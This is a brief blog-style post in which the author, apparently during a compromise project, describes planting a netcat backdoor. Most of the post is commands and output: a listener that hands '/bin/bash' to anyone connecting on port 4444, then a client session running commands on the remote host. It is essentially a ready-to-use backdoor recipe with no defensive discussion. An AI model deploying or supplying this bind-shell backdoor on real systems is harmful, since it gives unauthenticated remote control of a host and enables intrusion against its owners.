Remote bash shell using netcat


Overview

In a recent project, I was asked to compromise and install a backdoor shell by exploiting a flaw in the package management system. To keep it simple, I chose nc (netcat) as the conduit to make the connection and execute /bin/bash on the remote host.

Details

On the remote system, I deployed a nc listener waiting for a connection on TCP port 4444. When a connection is made, nc executes /bin/bash:

jemurray@home-server:~$ nc.traditional -lv -s 192.168.86.5 -p 4444 -e /bin/bash
listening on [192.168.86.5] 4444 ...

On the remote system, execute the nc client to connect to port 4444. No shell prompt is returned, but any command sent is executed in the /bin/bash shell:

jemurray@mbp-2019:~ $ nc 192.168.86.5 4444
hostname
home-server
uptime
 16:22:59 up 74 days, 23:08,  9 users,  load average: 1.04, 1.07, 1.02

In the next few months I will produce a full write up, stay tuned.